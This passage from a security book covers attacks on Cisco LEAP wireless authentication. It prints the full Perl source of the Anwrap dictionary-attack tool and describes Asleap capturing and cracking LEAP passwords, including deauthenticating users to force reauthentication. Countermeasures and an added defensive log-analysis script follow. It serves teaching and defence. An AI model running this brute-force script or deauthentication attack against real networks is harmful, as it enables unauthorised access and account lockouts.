LEAP ATTACKS

The LEAP wireless technology was first created and brought to market by Cisco Systems in December 2000. Cisco's LEAP is an 802.1X authentication scheme for wireless networks (WLANs), and by default LEAP supports strong two-way authentication and encryption. LEAP differs from most other authentication systems in that it relies on a remote RADIUS server for the actual authentication. Additionally, it uses a strong logon password as the encryption's "shared secret key" and provides dynamic per-user, per-session encryption keys.

Although a number of vendors support LEAP and have integrated it into their product suites, it is mainly found in Cisco wireless devices. Currently, LEAP is the main protocol within the Cisco Wireless Security Suite of protocols. LEAP is available at no additional cost and utilizes the standard 802.1X framework for transmission and packet decoding.

Anwrap

Popularity:   8
Simplicity:   9
Impact:       9
Risk Rating:  9

Anwrap is an extremely easy-to-use and highly dangerous wireless security tool. It is a wrapper for the ancontrol utility and serves as a dictionary attack tool against weak LEAP-enabled Cisco wireless devices. The tool walks through a user list and, for each user, tries each password in a password list to authenticate to a target system. All results are logged to a separate text file. The Anwrap Perl script source can be downloaded from http://www.securiteam.com/tools/6O00P2060I.html or potentially obtained by contacting Brian Barto (brian@bartosoft.com) or Ron Sweeney (sween@modelm.org). The following is the actual Anwrap tool source code written in Perl. Inline documentation has been provided.

    #!/usr/bin/perl
    #
    # Version 0.1
    # anwrap.pl is a wrapper for ancontrol that serves as a Dictionary
    # attack tool against LEAP enabled Cisco Wireless Networks. Traverses
    # a user list and password list attempting authentication and logging the
    # results to a file. Really wrecks havoc on RADIUS calls to NT Networks that
    # have lockout policies in place, you have been warned. Tweak the Timeouts,
    # a lengthy LEAP timeout on the Cisco side could make for a very boring afternoon.
    # This tool was designed to audit authentication strengths before deploying LEAP in
    # a production environment.
    #
    # Needs ancontrol and some Perl stuff, hit up CPAN until the errors go away.
    # Tested on FreeBSD 4.7.
    #
    # General Usage : $0 <userfile> <passwordfile> <logfile>
    #
    # Brian Barto <brian@bartosoft.com> and Ron Sweeney <sween@modelm.org>
    # November 2K02

    use Expect ();

    # All three arguments are required (the original only tested for the first one).
    if ($#ARGV < 2) { &usage; }

    #setup some stuff
    $userfile = $ARGV[0];
    $passfile = $ARGV[1];
    $logfile  = $ARGV[2];
    $date     = `date`;

    # Read the whole password list and user list into memory.
    open(GAR, "<$passfile") or die "can't open password file, $passfile";
    @GAR = <GAR>;
    close(GAR);
    open(USER, "<$userfile") or die "can't open user file, $userfile";
    @users = <USER>;
    close(USER);

    open(FILE, ">>$logfile") or die "can't open log file, $logfile";
    print FILE "\n\nScript started at $date \n\n";
    close(FILE);

    # Outer loop: one user at a time. Inner loop: walk the password list until
    # an attempt succeeds or the list is exhausted.
    foreach $user (@users) {
        chop($user);
        $auth_success     = "no";
        $end_of_passwords = "no";
        $i = 0;
        while ($auth_success eq "no" && $end_of_passwords eq "no") {
            $pass = $GAR[$i];
            chop($pass);
            local $/;
            # Drive the interactive ancontrol LEAP logon through Expect.
            $p = Expect->spawn('ancontrol -L ' . $user);
            $p->expect(5, "assw") || die "Never received LEAP password";
            print $p "$pass\r";
            print $pass, "\n";
            if ($p->expect(10, "uth")) {
                print "Success!\n";
                open(FILE, ">>$logfile") or die;
                print FILE "User: $user Password: $pass SUCCESS! ", "\n";
                close(FILE);
                $auth_success = "yes";
            } else {
                print "Failed\n";
                open(FILE, ">>$logfile") or die;
                print FILE "User: $user Password: $pass FAILED! ", "\n";
                close(FILE);
            }
            $p->close();
            if ($i == $#GAR) {
                $end_of_passwords = "yes";
            } else {
                $i++;
            }
        }
    }

    sub usage {
        print "\nUsage : $0 <userfile> <passwordfile> <logfile>\n\n";
        print "Ron Sweeney <sween\@modelm.org>\n";
        print "Brian Barto <brian\@bartosoft.com>\n\n\n\n";
        exit;
    }

Anwrap Countermeasures

Anwrap targets weak authentication credentials on Cisco LEAP-enabled wireless devices. The best protection for these poorly secured devices is to enforce strong authentication, meaning strong shared secrets and strong user passwords that do not appear in dictionaries, and to continuously audit the authentication service for the failed-logon bursts such a dictionary attack produces.
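As a defender-side complement to the auditing advice above, the following Python check is added here and is not part of the book or of the Anwrap tool. It scans RADIUS-style authentication logs for the footprint Anwrap leaves (a dense run of rejects against one user, then the next, from the same NAS) and separately reports accounts whose burst ended in an accept, meaning the wordlist contained that password. The log format and the sample lines are constructed assumptions, not any real server's output.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log; assumed simplified format: "<ISO time> <NAS-IP> <user> <ACCEPT|REJECT>"
SAMPLE_LOG = """\
2003-04-01T10:00:00 10.1.1.5 alice REJECT
2003-04-01T10:00:02 10.1.1.5 alice REJECT
2003-04-01T10:00:04 10.1.1.5 alice REJECT
2003-04-01T10:00:06 10.1.1.5 alice REJECT
2003-04-01T10:00:08 10.1.1.5 alice REJECT
2003-04-01T10:00:10 10.1.1.5 alice ACCEPT
2003-04-01T10:00:12 10.1.1.5 bob REJECT
2003-04-01T10:00:14 10.1.1.5 bob REJECT
2003-04-01T10:00:16 10.1.1.5 bob REJECT
2003-04-01T10:00:18 10.1.1.5 bob REJECT
2003-04-01T10:00:20 10.1.1.5 bob REJECT
2003-04-01T10:30:00 10.1.1.9 carol REJECT
2003-04-01T10:30:05 10.1.1.9 carol ACCEPT
"""

def parse_line(line):
    """Split one log line into (time, nas, user, accepted)."""
    ts, nas, user, result = line.split()
    return datetime.fromisoformat(ts), nas, user, result == "ACCEPT"

def analyze(log_text, max_failures=5, window=timedelta(minutes=5)):
    """Return (bursts, guessed): bursts maps (nas, user) to the peak reject
    count inside any sliding `window`, kept when it reaches max_failures (a
    wordlist run against one account); guessed lists users whose burst was
    followed by an ACCEPT from the same NAS, i.e. the wordlist held their password."""
    rejects, accepts = defaultdict(list), defaultdict(list)
    for line in filter(str.strip, log_text.splitlines()):
        ts, nas, user, ok = parse_line(line)
        (accepts if ok else rejects)[(nas, user)].append(ts)
    bursts = {}
    for key, times in rejects.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # drop rejects older than the window
                start += 1
            count = end - start + 1
            if count >= max_failures and count > bursts.get(key, 0):
                bursts[key] = count
    guessed = sorted(user for (nas, user) in bursts
                     if any(t > rejects[(nas, user)][0] for t in accepts[(nas, user)]))
    return bursts, guessed
```

Tune `max_failures` and `window` to the LEAP timeout and lockout policy in use; a lockout policy will cap the rejects per user but makes the one-user-after-another pattern from a single NAS even more visible.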

Asleap

Popularity:   7
Simplicity:   6
Impact:       5
Risk Rating:  6

Asleap is a wireless security tool designed to capture and crack weak LEAP passwords exchanged between Cisco wireless access points and their wireless clients. Asleap can read live traffic from any supported wireless network card in RFMON mode, and if you want to monitor multiple frequency channels, it supports channel hopping. When a wireless card or access point is identified, the obtained information is displayed to the user in near real time. Stored PCAP files or AiroPeek NX files can be used as input when previously captured data is to be analyzed or processed.

A distinctive feature of Asleap is that it can integrate with AirJack to knock authenticated wireless users off targeted wireless networks. The benefit of this feature is that you can deauthenticate every user on a network to force them to reauthenticate to the access point. Then, when a user reauthenticates to a Cisco LEAP-enabled device, their password is sniffed and cracked with Asleap. This tool is a must-have for all wireless penetration testers!

Installing Asleap is an extremely easy process. You start by running the make command. After compiling ("making") the asleap and genkeys binaries, you are ready to run the tool. To automatically deauthenticate (knock off) wireless network users, you must first download and install the drivers and binaries for the AirJack tool. AirJack can be downloaded from http://802.11ninja.net. Asleap can be downloaded from http://asleap.sourceforge.net.

Asleap Countermeasures

Asleap countermeasures are the same as the ones for the previously discussed Anwrap LEAP-attacking tool.



Hacking Exposed
Hacking Exposed 5th Edition
ISBN: B0018SYWW0
EAN: N/A
Year: 2003
Pages: 127
